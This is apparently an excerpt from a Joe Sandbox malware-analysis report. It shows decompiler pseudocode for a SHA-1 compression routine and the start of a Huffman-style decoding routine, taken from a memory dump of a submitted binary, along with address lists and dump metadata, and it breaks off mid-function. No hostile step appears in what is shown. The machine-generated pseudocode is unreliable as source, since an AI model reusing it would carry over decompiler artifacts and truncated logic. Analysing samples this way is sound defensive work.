				signed int _t554;
				signed int _t563;
				signed int* _t591;
				signed int _t592;
				signed int _t596;
				signed int _t599;
				signed int _t600;
				signed int* _t601;
				signed int _t602;
				signed int _t604;
				signed int _t606;
				signed int _t607;
				signed int* _t608;
				signed int _t609;
				signed int* _t675;
				signed int* _t746;
				signed int _t757;
				signed int _t774;
				signed int _t778;
				signed int _t782;
				signed int _t783;
				signed int _t787;
				signed int _t788;
				signed int _t792;
				signed int _t797;
				signed int _t801;
				signed int _t805;
				signed int _t807;
				signed int _t810;
				signed int* _t812;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t821;
				signed int _t822;
				signed int _t826;
				signed int _t831;
				signed int _t835;
				signed int _t839;
				signed int* _t840;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t846;
				signed int _t847;
				signed int _t849;
				signed int* _t850;
				signed int _t853;
				signed int _t857;
				signed int _t858;
				signed int* _t862;
				signed int _t863;
				signed int _t865;
				signed int _t866;
				signed int _t870;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t883;
				signed int _t887;
				signed int _t888;
				signed int* _t889;
				signed int _t890;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int _t899;
				signed int _t900;
				signed int _t902;
				signed int _t903;
				signed int* _t904;
				signed int _t905;
				signed int _t907;
				signed int _t908;
				signed int _t910;
				signed int _t911;

				_t912 =  &_v40;
				if(_a16 == 0) {
					_t840 = _a8;
					_v20 = _t840;
					E00A50320(_t840, _a12, 0x40);
					_t912 =  &(( &_v40)[3]);
				} else {
					_t840 = _a12;
					_v20 = _t840;
				}
				_t850 = _a4;
				_t592 = _t850[1];
				_t894 =  *_t850;
				_v28 = _t850[2];
				_v24 = _t850[3];
				_v32 = _t592;
				_v36 = 0;
				_t434 = E00A568E4( *_t840);
				asm("rol edx, 0x5");
				 *_t840 = _t434;
				_t435 = _t840;
				_t596 = (_t592 & (_v24 ^ _v28) ^ _v24) + _t894 + _t434 + _t850[4] + 0x5a827999;
				_v16 = _t840;
				_t853 = _v32;
				asm("ror esi, 0x2");
				_v32 =  &(_t840[3]);
				do {
					_t436 = E00A568E4(_t435[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t436;
					asm("ror ebp, 0x2");
					_v24 = _v24 + 0x5a827999 + ((_v28 ^ _t853) & _t894 ^ _v28) + _t596 + _t436;
					_t441 = E00A568E4( *((intOrPtr*)(_v32 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 - 4)) = _t441;
					asm("ror ebx, 0x2");
					_v28 = _v28 + 0x5a827999 + ((_t853 ^ _t894) & _t596 ^ _t853) + _v24 + _t441;
					_t446 = E00A568E4( *_v32);
					asm("rol edx, 0x5");
					 *_v32 = _t446;
					asm("ror dword [esp+0x2c], 0x2");
					_t853 = _t853 + ((_t596 ^ _t894) & _v24 ^ _t894) + _v28 + 0x5a827999 + _t446;
					_t448 = E00A568E4( *((intOrPtr*)(_v32 + 4)));
					_v32 = _v32 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v32 + 4)) = _t448;
					_t451 = _v36 + 5;
					asm("ror dword [esp+0x2c], 0x2");
					_v36 = _t451;
					_t894 = _t894 + ((_t596 ^ _v24) & _v28 ^ _t596) + _t853 + _t448 + 0x5a827999;
					_v16 =  &(_t840[_t451]);
					_t453 = E00A568E4(_t840[_t451]);
					_t912 =  &(_t912[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t453;
					_t435 = _v16;
					asm("ror esi, 0x2");
					_t596 = _t596 + 0x5a827999 + ((_v24 ^ _v28) & _t853 ^ _v24) + _t894 + _t453;
				} while (_v36 != 0xf);
				_t774 = _t840[0xe] ^ _t840[9] ^ _t840[1] ^ _t840[3];
				_v32 = _t853;
				_t857 = _t840[0xd] ^ _t840[8] ^  *_t840 ^ _t840[2];
				asm("rol ecx, 0x5");
				asm("rol esi, 1");
				asm("rol edx, 1");
				asm("ror ebp, 0x2");
				_t840[1] = _t774;
				_t459 = ((_v28 ^ _v32) & _t894 ^ _v28) + _t596 + _t857 + _v24 + 0x5a827999;
				 *_t840 = _t857;
				_v40 = _t459;
				asm("rol ecx, 0x5");
				_t778 = _t840[0xf] ^ _t840[0xa] ^ _t840[4] ^ _t840[2];
				_t465 = ((_v32 ^ _t894) & _t596 ^ _v32) + _t459 + _t774 + _v28 + 0x5a827999;
				_v36 = _t465;
				asm("ror ebx, 0x2");
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror dword [esp+0x10], 0x2");
				_t840[2] = _t778;
				_t471 = ((_t596 ^ _t894) & _v40 ^ _t894) + _t465 + _t778 + _v32 + 0x5a827999;
				_v32 = _t471;
				asm("rol ecx, 0x5");
				_t782 = _t840[0xb] ^ _t840[5] ^ _t857 ^ _t840[3];
				_t858 = _v40;
				asm("rol edx, 1");
				_t840[3] = _t782;
				_v24 = _t596;
				asm("ror dword [esp+0x18], 0x2");
				_t783 = 0x11;
				_v28 = ((_t596 ^ _t858) & _v36 ^ _t596) + _t471 + 0x5a827999 + _t782 + _t894;
				_v16 = _t783;
				do {
					_t96 = _t783 + 5; // 0x16
					_t478 = _t96;
					_t97 = _t783 - 5; // 0xc
					_v8 = _t478;
					_t99 = _t783 + 3; // 0x14
					_t896 = _t99 & 0x0000000f;
					_v12 = _t896;
					_t599 = _t478 & 0x0000000f;
					asm("rol ecx, 0x5");
					_t787 = _t840[_t97 & 0x0000000f] ^ _t840[_t783 & 0x0000000f] ^ _t840[_t896] ^ _t840[_t599];
					_t481 = _v16;
					asm("rol edx, 1");
					_t840[_t896] = _t787;
					_t897 = _v32;
					asm("ror ebp, 0x2");
					_v32 = _t897;
					_t862 = _v20;
					_v24 = _v24 + 0x6ed9eba1 + (_t858 ^ _v36 ^ _t897) + _v28 + _t787;
					_t788 = 0xf;
					_t899 = _t481 + 0x00000004 & _t788;
					_t842 = _t481 + 0x00000006 & _t788;
					_t792 =  *(_t862 + (_t481 - 0x00000004 & _t788) * 4) ^  *(_t862 + (_t481 + 0x00000001 & _t788) * 4) ^  *(_t862 + _t899 * 4) ^  *(_t862 + _t842 * 4);
					asm("rol edx, 1");
					 *(_t862 + _t899 * 4) = _t792;
					_t863 = _v28;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_v28 = _t863;
					_t488 = _v16;
					_v40 = _v40 + 0x6ed9eba1 + (_v36 ^ _v32 ^ _t863) + _v24 + _t792;
					_t865 = _t488 + 0x00000007 & 0x0000000f;
					_t675 = _v20;
					_t797 = _v20[_t488 - 0x00000003 & 0x0000000f] ^  *(_t675 + (_t488 + 0x00000002 & 0x0000000f) * 4) ^  *(_t675 + _t865 * 4) ^  *(_t675 + _t599 * 4);
					asm("rol edx, 1");
					 *(_t675 + _t599 * 4) = _t797;
					_t600 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t600;
					_t601 = _v20;
					_v36 = _v36 + 0x6ed9eba1 + (_t600 ^ _v32 ^ _v28) + _v40 + _t797;
					asm("rol ecx, 0x5");
					_t801 =  *(_t601 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t601 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t601 + _t842 * 4) ^  *(_t601 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t601 + _t842 * 4) = _t801;
					_t602 = _v24;
					_t843 = _v40;
					asm("ror edi, 0x2");
					_v40 = _t843;
					_t840 = _v20;
					_v32 = _v32 + 0x6ed9eba1 + (_t602 ^ _t843 ^ _v28) + _v36 + _t801;
					_t805 = _t840[_v16 - 0x00000007 & 0x0000000f] ^ _t840[_v16 - 0x00000001 & 0x0000000f] ^ _t840[_t865] ^ _t840[_t899];
					_t900 = _v36;
					asm("rol edx, 1");
					asm("rol ecx, 0x5");
					_t840[_t865] = _t805;
					_t858 = _v40;
					_t783 = _v8;
					asm("ror ebp, 0x2");
					_v36 = _t900;
					_v16 = _t783;
					_v28 = _v28 + 0x6ed9eba1 + (_t602 ^ _t858 ^ _t900) + _v32 + _t805;
				} while (_t783 + 3 <= 0x23);
				_t866 = 0x25;
				_v16 = _t866;
				while(1) {
					_t205 = _t866 + 5; // 0x2a
					_t511 = _t205;
					_t206 = _t866 - 5; // 0x20
					_v4 = _t511;
					_t208 = _t866 + 3; // 0x28
					_t807 = _t208 & 0x0000000f;
					_v8 = _t807;
					_t902 = _t511 & 0x0000000f;
					_t870 = _t840[_t206 & 0x0000000f] ^ _t840[_t866 & 0x0000000f] ^ _t840[_t902] ^ _t840[_t807];
					asm("rol esi, 1");
					_t840[_t807] = _t870;
					asm("ror dword [esp+0x1c], 0x2");
					asm("rol edx, 0x5");
					_t871 = 0xf;
					_v24 = _v28 - 0x70e44324 + ((_v36 | _v32) & _v40 | _v36 & _v32) + _t870 + _t602;
					_t518 = _v16;
					_t604 = _t518 + 0x00000006 & _t871;
					_t810 = _t518 + 0x00000004 & _t871;
					_v12 = _t810;
					_t875 = _t840[_t518 - 0x00000004 & _t871] ^ _t840[_t518 + 0x00000001 & _t871] ^ _t840[_t810] ^ _t840[_t604];
					asm("rol esi, 1");
					_t840[_t810] = _t875;
					_t844 = _v28;
					asm("rol edx, 0x5");
					asm("ror edi, 0x2");
					_v28 = _t844;
					_t812 = _v20;
					_v40 = _v24 - 0x70e44324 + ((_v32 | _t844) & _v36 | _v32 & _t844) + _t875 + _v40;
					_t525 = _v16;
					_t846 = _t525 + 0x00000007 & 0x0000000f;
					_t879 =  *(_t812 + (_t525 - 0x00000003 & 0x0000000f) * 4) ^  *(_t812 + (_t525 + 0x00000002 & 0x0000000f) * 4) ^  *(_t812 + _t846 * 4) ^  *(_t812 + _t902 * 4);
					asm("rol esi, 1");
					 *(_t812 + _t902 * 4) = _t879;
					asm("rol edx, 0x5");
					_t903 = _v24;
					asm("ror ebp, 0x2");
					_t815 = _v40 + 0x8f1bbcdc + ((_t903 | _v28) & _v32 | _t903 & _v28) + _t879 + _v36;
					_v24 = _t903;
					_t904 = _v20;
					_v36 = _t815;
					asm("rol edx, 0x5");
					_t883 =  *(_t904 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t904 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t904 + _v8 * 4) ^  *(_t904 + _t604 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t604 * 4) = _t883;
					_t602 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_t816 = _t815 + ((_t602 | _v40) & _v28 | _t602 & _v40) + 0x8f1bbcdc + _t883 + _v32;
					_v32 = _t816;
					asm("rol edx, 0x5");
					_t887 =  *(_t904 + (_v16 - 0x00000007 & 0x0000000f) * 4) ^  *(_t904 + (_v16 - 0x00000001 & 0x0000000f) * 4) ^  *(_t904 + _v12 * 4) ^  *(_t904 + _t846 * 4);
					asm("rol esi, 1");
					 *(_t904 + _t846 * 4) = _t887;
					_t905 = _v36;
					asm("ror ebp, 0x2");
					_v36 = _t905;
					_t309 = _t816 - 0x70e44324; // -4294967294
					_t866 = _v4;
					_v28 = _t309 + ((_v40 | _t905) & _t602 | _v40 & _t905) + _t887 + _v28;
					_v16 = _t866;
					if(_t866 + 3 > 0x37) {
						break;
					}
					_t840 = _v20;
				}
				_t817 = 0x39;
				_v16 = _t817;
				_t847 = _t602;
				do {
					_t315 = _t817 + 5; // 0x3e
					_t545 = _t315;
					_v8 = _t545;
					_t317 = _t817 + 3; // 0x3c
					_t318 = _t817 - 5; // 0x34
					_t888 = 0xf;
					_t907 = _t317 & _t888;
					_t606 = _t545 & _t888;
					_t889 = _v20;
					_v4 = _t907;
					_t821 =  *(_t889 + (_t318 & _t888) * 4) ^  *(_t889 + (_t817 & _t888) * 4) ^  *(_t889 + _t907 * 4) ^  *(_t889 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t907 * 4) = _t821;
					_t908 = _v32;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v32 = _t908;
					_v24 = (_v40 ^ _v36 ^ _t908) + _t821 + _t847 + _v28 + 0xca62c1d6;
					_t554 = _v16;
					_t822 = 0xf;
					_t849 = _t554 + 0x00000006 & _t822;
					_t910 = _t554 + 0x00000004 & _t822;
					_t826 =  *(_t889 + (_t554 - 0x00000004 & _t822) * 4) ^  *(_t889 + (_t554 + 0x00000001 & _t822) * 4) ^  *(_t889 + _t910 * 4) ^  *(_t889 + _t849 * 4);
					asm("rol edx, 1");
					 *(_t889 + _t910 * 4) = _t826;
					_t890 = _v28;
					asm("rol ecx, 0x5");
					_v40 = (_v36 ^ _v32 ^ _t890) + _t826 + _v40 + _v24 + 0xca62c1d6;
					_t563 = _v16;
					asm("ror esi, 0x2");
					_v28 = _t890;
					_t892 = _t563 + 0x00000007 & 0x0000000f;
					_t746 = _v20;
					_t831 = _v20[_t563 - 0x00000003 & 0x0000000f] ^  *(_t746 + (_t563 + 0x00000002 & 0x0000000f) * 4) ^  *(_t746 + _t892 * 4) ^  *(_t746 + _t606 * 4);
					asm("rol edx, 1");
					 *(_t746 + _t606 * 4) = _t831;
					_t607 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t607;
					_t608 = _v20;
					_v36 = (_t607 ^ _v32 ^ _v28) + _t831 + _v36 + _v40 + 0xca62c1d6;
					asm("rol ecx, 0x5");
					_t835 = _t608[_v16 - 0x00000008 & 0x0000000f] ^ _t608[_v16 + 0xfffffffe & 0x0000000f] ^ _t608[_v4] ^ _t608[_t849];
					asm("rol edx, 1");
					_t608[_t849] = _t835;
					_t847 = _v24;
					asm("ror dword [esp+0x10], 0x2");
					_v32 = (_t847 ^ _v40 ^ _v28) + _t835 + _v32 + _v36 + 0xca62c1d6;
					_t839 = _t608[_v16 - 0x00000007 & 0x0000000f] ^ _t608[_v16 - 0x00000001 & 0x0000000f] ^ _t608[_t892] ^ _t608[_t910];
					_t911 = _v36;
					asm("rol edx, 1");
					_t608[_t892] = _t839;
					_t609 = _v40;
					_t893 = _v32;
					asm("ror ebp, 0x2");
					_t817 = _v8;
					asm("rol ecx, 0x5");
					_v36 = _t911;
					_t757 = _t893 + 0xca62c1d6 + (_t847 ^ _t609 ^ _t911) + _t839 + _v28;
					_v16 = _t817;
					_v28 = _t757;
				} while (_t817 + 3 <= 0x4b);
				_t591 = _a4;
				_t591[1] = _t591[1] + _t893;
				_t591[2] = _t591[2] + _t911;
				_t591[3] = _t591[3] + _t609;
				 *_t591 =  *_t591 + _t757;
				_t591[4] = _t591[4] + _t847;
				return _t591;
			}

0x00a3f461
0x00a3f46d
0x00a3f479
0x00a3f483
0x00a3f488
0x00a3f48d
0x00a3f46f
0x00a3f46f
0x00a3f473
0x00a3f473
0x00a3f490
0x00a3f499
0x00a3f49c
0x00a3f49e
0x00a3f4a8
0x00a3f4ae
0x00a3f4b2
0x00a3f4b6
0x00a3f4ce
0x00a3f4da
0x00a3f4de
0x00a3f4e0
0x00a3f4e2
0x00a3f4e6
0x00a3f4ea
0x00a3f4ed
0x00a3f4f1
0x00a3f4f4
0x00a3f4ff
0x00a3f504
0x00a3f51e
0x00a3f523
0x00a3f52e
0x00a3f53b
0x00a3f540
0x00a3f554
0x00a3f55b
0x00a3f565
0x00a3f572
0x00a3f57b
0x00a3f58b
0x00a3f597
0x00a3f599
0x00a3f5a4
0x00a3f5a9
0x00a3f5ac
0x00a3f5c0
0x00a3f5c7
0x00a3f5ce
0x00a3f5d7
0x00a3f5db
0x00a3f5df
0x00a3f5ea
0x00a3f5ed
0x00a3f5f0
0x00a3f5fc
0x00a3f60e
0x00a3f611
0x00a3f613
0x00a3f62d
0x00a3f630
0x00a3f646
0x00a3f649
0x00a3f64c
0x00a3f650
0x00a3f654
0x00a3f661
0x00a3f664
0x00a3f666
0x00a3f668
0x00a3f674
0x00a3f694
0x00a3f697
0x00a3f699
0x00a3f69f
0x00a3f6a2
0x00a3f6a8
0x00a3f6b1
0x00a3f6ba
0x00a3f6cd
0x00a3f6d1
0x00a3f6d7
0x00a3f6da
0x00a3f6df
0x00a3f6eb
0x00a3f6f5
0x00a3f6fa
0x00a3f702
0x00a3f707
0x00a3f708
0x00a3f70c
0x00a3f710
0x00a3f714
0x00a3f714
0x00a3f717
0x00a3f71a
0x00a3f721
0x00a3f726
0x00a3f72b
0x00a3f732
0x00a3f73c
0x00a3f745
0x00a3f748
0x00a3f74c
0x00a3f750
0x00a3f753
0x00a3f75b
0x00a3f76b
0x00a3f774
0x00a3f778
0x00a3f781
0x00a3f784
0x00a3f786
0x00a3f798
0x00a3f7a3
0x00a3f7a5
0x00a3f7a8
0x00a3f7ae
0x00a3f7b3
0x00a3f7c6
0x00a3f7cc
0x00a3f7d0
0x00a3f7e0
0x00a3f7e9
0x00a3f7f3
0x00a3f7f6
0x00a3f7f8
0x00a3f7ff
0x00a3f805
0x00a3f814
0x00a3f821
0x00a3f827
0x00a3f82f
0x00a3f850
0x00a3f853
0x00a3f856
0x00a3f85a
0x00a3f85d
0x00a3f863
0x00a3f86f
0x00a3f87c
0x00a3f880
0x00a3f88a
0x00a3f8a3
0x00a3f8aa
0x00a3f8ae
0x00a3f8b0
0x00a3f8b3
0x00a3f8b8
0x00a3f8be
0x00a3f8c6
0x00a3f8d3
0x00a3f8d9
0x00a3f8e0
0x00a3f8e4
0x00a3f8ef
0x00a3f8f0
0x00a3f8fa
0x00a3f8fa
0x00a3f8fa
0x00a3f8fd
0x00a3f900
0x00a3f907
0x00a3f90c
0x00a3f911
0x00a3f918
0x00a3f926
0x00a3f93d
0x00a3f93f
0x00a3f94a
0x00a3f94f
0x00a3f952
0x00a3f95b
0x00a3f95f
0x00a3f966
0x00a3f96b
0x00a3f972
0x00a3f982
0x00a3f98b
0x00a3f98d
0x00a3f990
0x00a3f9a4
0x00a3f9ab
0x00a3f9ae
0x00a3f9b8
0x00a3f9be
0x00a3f9c2
0x00a3f9d2
0x00a3f9e1
0x00a3f9e4
0x00a3f9e6
0x00a3f9ed
0x00a3f9f0
0x00a3fa0c
0x00a3fa19
0x00a3fa1b
0x00a3fa1f
0x00a3fa26
0x00a3fa2d
0x00a3fa46
0x00a3fa4a
0x00a3fa4c
0x00a3fa50
0x00a3fa64
0x00a3fa7b
0x00a3fa80
0x00a3fa87
0x00a3fa9e
0x00a3faa8
0x00a3faaa
0x00a3faae
0x00a3faba
0x00a3fabf
0x00a3fac7
0x00a3facd
0x00a3fad3
0x00a3fad7
0x00a3fae1
0x00000000
0x00000000
0x00a3f8f6
0x00a3f8f6
0x00a3fae9
0x00a3faea
0x00a3faee
0x00a3faf0
0x00a3faf0
0x00a3faf0
0x00a3faf5
0x00a3faf9
0x00a3fafe
0x00a3fb03
0x00a3fb08
0x00a3fb0a
0x00a3fb0c
0x00a3fb10
0x00a3fb1f
0x00a3fb2e
0x00a3fb30
0x00a3fb33
0x00a3fb3b
0x00a3fb40
0x00a3fb49
0x00a3fb4f
0x00a3fb53
0x00a3fb57
0x00a3fb5e
0x00a3fb60
0x00a3fb73
0x00a3fb82
0x00a3fb84
0x00a3fb87
0x00a3fb8f
0x00a3fba2
0x00a3fba6
0x00a3fbaa
0x00a3fbad
0x00a3fbbd
0x00a3fbc6
0x00a3fbd0
0x00a3fbd3
0x00a3fbd5
0x00a3fbdc
0x00a3fbe0
0x00a3fbf5
0x00a3fbfe
0x00a3fc02
0x00a3fc06
0x00a3fc28
0x00a3fc34
0x00a3fc37
0x00a3fc39
0x00a3fc3c
0x00a3fc4a
0x00a3fc57
0x00a3fc74
0x00a3fc77
0x00a3fc7b
0x00a3fc7d
0x00a3fc80
0x00a3fc86
0x00a3fc8e
0x00a3fc97
0x00a3fc9b
0x00a3fca4
0x00a3fca8
0x00a3fcaa
0x00a3fcb1
0x00a3fcb5
0x00a3fcbe
0x00a3fcc2
0x00a3fcc5
0x00a3fcc8
0x00a3fccb
0x00a3fccd
0x00a3fcd7

Memory Dump Source

Source File: 00000000.00000002.259400742.0000000000A31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true

Associated: 00000000.00000002.259371381.0000000000A30000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259791588.0000000000A63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A75000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259960919.0000000000A92000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260050051.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a30000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction ID: 16f052d1963eaeb443c57f328ba6038ca6336b51f78348676de2edec5e85d380
Opcode Fuzzy Hash: 1878276514fa88b4dc78be59b3a11d6ef0ca78ea051cd932ee5a1b4ffb735fc3
Instruction Fuzzy Hash: 6E523A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00A47153 Relevance: .5, Instructions: 536
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E00A47153(signed int __ecx) {
				void* __ebp;
				void* _t220;
				signed int* _t223;
				signed int _t225;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t233;
				signed int _t234;
				signed short _t235;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				unsigned int _t250;
				signed int _t260;
				signed int _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed short _t276;
				signed int _t277;
				signed int _t281;
				signed int _t282;
				unsigned int _t283;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed short _t293;
				unsigned int _t298;
				signed int _t303;
				unsigned int _t305;
				signed int _t310;
				signed short _t311;
				signed int _t316;
				intOrPtr* _t321;
				signed int* _t322;
				unsigned int _t324;
				signed int _t325;
				signed int _t326;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t340;
				signed int _t342;
				intOrPtr _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				void* _t349;
				signed int _t352;
				signed int _t353;
				unsigned int _t356;
				signed int _t357;
				void* _t358;
				signed int _t361;
				signed int _t362;
				void* _t365;
				signed int _t368;
				signed int _t369;
				intOrPtr* _t371;
				void* _t372;
				signed int* _t376;
				signed int _t379;
				unsigned int _t382;
				signed int _t383;
				void* _t384;
				signed int _t387;
				void* _t390;
				unsigned int _t393;
				signed int _t394;
				unsigned int _t397;
				void* _t399;
				signed int _t402;
				intOrPtr* _t404;
				void* _t405;
				signed int _t408;
				void* _t411;
				signed int _t415;
				signed int _t416;
				intOrPtr* _t418;
				void* _t419;
				void* _t422;
				signed int _t425;
				intOrPtr* _t429;
				void* _t430;
				signed int* _t436;
				unsigned int _t438;
				unsigned int _t442;
				signed int _t445;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				unsigned int _t451;
				unsigned int _t455;
				signed int _t458;
				unsigned int _t459;
				signed int _t461;
				signed int _t462;
				void* _t463;
				signed int _t464;
				signed int* _t465;
				signed char _t466;
				signed int* _t468;
				signed int* _t470;
				signed int _t473;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				void* _t479;

				_t466 =  *(_t479 + 0x44);
				 *(_t479 + 0x30) = __ecx;
				_t321 = _t466 + 0x18;
				_t465 = _t466 + 4;
				if( *((char*)(_t466 + 0x2c)) != 0) {
					L2:
					_t344 =  *_t321;
					_t220 =  *((intOrPtr*)(_t466 + 0x24)) + _t344;
					if( *_t465 <= _t220) {
						 *(_t466 + 0x4ad8) =  *(_t466 + 0x4ad8) & 0x00000000;
						_t223 =  *((intOrPtr*)(_t466 + 0x20)) - 1 + _t344;
						_t436 =  *((intOrPtr*)(_t466 + 0x4acc)) - 0x10;
						 *(_t479 + 0x1c) = _t223;
						 *(_t479 + 0x18) = _t436;
						__eflags = _t223 - _t436;
						if(_t223 >= _t436) {
							_t468 = _t436;
							 *(_t479 + 0x14) = _t436;
						} else {
							_t468 = _t223;
							 *(_t479 + 0x14) = _t468;
						}
						_t322 = _t466 + 0x4ad4;
						while(1) {
							_t345 =  *_t465;
							 *(_t479 + 0x10) = _t322;
							__eflags = _t345 - _t468;
							if(_t345 < _t468) {
								goto L15;
							}
							__eflags = _t345 - _t223;
							if(__eflags > 0) {
								L93:
								return _t223;
							}
							if(__eflags != 0) {
								L12:
								__eflags = _t345 - _t436;
								if(_t345 < _t436) {
									L14:
									_t223 = _t466 + 0x4ad4;
									_t322 = _t223;
									 *(_t479 + 0x10) = _t223;
									__eflags = _t345 -  *((intOrPtr*)(_t466 + 0x4acc));
									if(_t345 >=  *((intOrPtr*)(_t466 + 0x4acc))) {
										L92:
										 *((char*)(_t466 + 0x4ad3)) = 1;
										goto L93;
									}
									goto L15;
								}
								__eflags =  *((char*)(_t466 + 0x4ad2));
								if( *((char*)(_t466 + 0x4ad2)) == 0) {
									goto L92;
								}
								goto L14;
							}
							_t223 =  *(_t466 + 8);
							__eflags = _t223 -  *((intOrPtr*)(_t466 + 0x1c));
							if(_t223 >=  *((intOrPtr*)(_t466 + 0x1c))) {
								goto L93;
							}
							goto L12;
							L15:
							_t346 =  *(_t466 + 0x4adc);
							__eflags =  *(_t466 + 0x4ad8) - _t346 - 8;
							if( *(_t466 + 0x4ad8) > _t346 - 8) {
								_t316 = _t346 + _t346;
								 *(_t466 + 0x4adc) = _t316;
								_push(_t316 * 0xc);
								_push( *_t322);
								_t477 = E00A53E3E(_t346, _t436);
								__eflags = _t477;
								if(_t477 == 0) {
									E00A36CA7(0xa71098);
								}
								 *_t322 = _t477;
							}
							_t225 =  *(_t466 + 0x4ad8);
							_t470 = _t225 * 0xc +  *_t322;
							 *(_t479 + 0x2c) = _t470;
							 *(_t466 + 0x4ad8) = _t225 + 1;
							_t227 = E00A3A89D(_t465);
							_t228 =  *(_t466 + 0xb4);
							_t438 = _t227 & 0x0000fffe;
							__eflags = _t438 -  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4));
							if(_t438 >=  *((intOrPtr*)(_t466 + 0x34 + _t228 * 4))) {
								_t348 = 0xf;
								_t229 = _t228 + 1;
								 *(_t479 + 0x28) = _t348;
								__eflags = _t229 - _t348;
								if(_t229 >= _t348) {
									L27:
									_t324 = _t465[1] + _t348;
									_t325 = _t324 & 0x00000007;
									 *_t465 =  *_t465 + (_t324 >> 3);
									 *(_t479 + 0x18) =  *_t465;
									_t233 =  *(_t479 + 0x28);
									_t465[1] = _t325;
									_t349 = 0x10;
									_t352 =  *((intOrPtr*)(_t466 + 0x74 + _t233 * 4)) + (_t438 -  *((intOrPtr*)(_t466 + 0x30 + _t233 * 4)) >> _t349 - _t233);
									__eflags = _t352 -  *((intOrPtr*)(_t466 + 0x30));
									asm("sbb eax, eax");
									_t234 = _t233 & _t352;
									__eflags = _t234;
									_t235 =  *(_t466 + 0xcb8 + _t234 * 2) & 0x0000ffff;
									goto L28;
								}
								_t429 = _t466 + 0x34 + _t229 * 4;
								while(1) {
									__eflags = _t438 -  *_t429;
									if(_t438 <  *_t429) {
										break;
									}
									_t229 = _t229 + 1;
									_t429 = _t429 + 4;
									__eflags = _t229 - 0xf;
									if(_t229 < 0xf) {
										continue;
									}
									_t348 =  *(_t479 + 0x28);
									goto L27;
								}
								_t348 = _t229;
								 *(_t479 + 0x28) = _t229;
								goto L27;
							} else {
								_t430 = 0x10;
								_t464 = _t438 >> _t430 - _t228;
								_t342 = ( *(_t464 + _t466 + 0xb8) & 0x000000ff) + _t465[1];
								 *_t465 =  *_t465 + (_t342 >> 3);
								_t325 = _t342 & 0x00000007;
								 *(_t479 + 0x18) =  *_t465;
								_t465[1] = _t325;
								_t235 =  *(_t466 + 0x4b8 + _t464 * 2) & 0x0000ffff;
								L28:
								_t353 = _t235 & 0x0000ffff;
								__eflags = _t353 - 0x100;
								if(_t353 >= 0x100) {
									__eflags = _t353 - 0x106;
									if(_t353 < 0x106) {
										__eflags = _t353 - 0x100;
										if(_t353 != 0x100) {
											__eflags = _t353 - 0x101;
											if(_t353 != 0x101) {
												_t237 = 3;
												 *_t470 = _t237;
												_t470[2] = _t353 - 0x102;
												_t239 = E00A3A89D(_t465);
												_t240 =  *(_t466 + 0x2d78);
												_t442 = _t239 & 0x0000fffe;
												__eflags = _t442 -  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4));
												if(_t442 >=  *((intOrPtr*)(_t466 + 0x2cf8 + _t240 * 4))) {
													_t326 = 0xf;
													_t241 = _t240 + 1;
													__eflags = _t241 - _t326;
													if(_t241 >= _t326) {
														L86:
														_t356 = _t465[1] + _t326;
														_t357 = _t356 & 0x00000007;
														_t465[1] = _t357;
														_t243 = _t356 >> 3;
														 *_t465 =  *_t465 + _t243;
														 *(_t479 + 0x30) = _t357;
														_t358 = 0x10;
														_t361 =  *((intOrPtr*)(_t466 + 0x2d38 + _t326 * 4)) + (_t442 -  *((intOrPtr*)(_t466 + 0x2cf4 + _t326 * 4)) >> _t358 - _t326);
														__eflags = _t361 -  *((intOrPtr*)(_t466 + 0x2cf4));
														asm("sbb eax, eax");
														_t244 = _t243 & _t361;
														__eflags = _t244;
